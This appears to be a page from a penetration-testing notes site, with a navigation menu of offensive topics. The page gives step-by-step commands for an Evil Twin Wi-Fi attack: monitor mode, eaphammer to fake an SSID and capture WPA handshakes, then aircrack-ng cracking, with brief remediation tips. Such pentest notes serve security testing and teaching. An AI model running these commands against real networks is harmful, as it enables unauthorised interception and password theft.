🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  • Evil Twin w/o AP
  • Preparation
  • Execution
  • Remediation
  1. WiFi Pentesting

Evil Twin - Wi-Fi

PreviousAttack WEPNextWPA3 Downgrade

Last updated 1 month ago

Evil Twin w/o AP

Preparation

Execution

  1. Monitor mode

ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
  1. Power up the Evil Twin with eaphammer

./eaphammer -i <interface> --channel <channel number> --auth wpa-psk --essid <ssid> --capture-wpa-handshakes yes

example:

./eaphammer -i wlan0 --channel 1 --auth wpa-psk --essid Office1 --capture-wpa-handshakes yes
  1. Crack it

aircrack-ng <handshake file> -w <wordlist>

Note:

If eaphammer are going error, just restart the monitor mode.

this method also effective without mention the channel number, so you just need to specify the SSID

Remediation

It's best to turn off your Wi-Fi when you're not using it.

Avoid using connect automatically.

https://github.com/s0lst1c3/eaphammer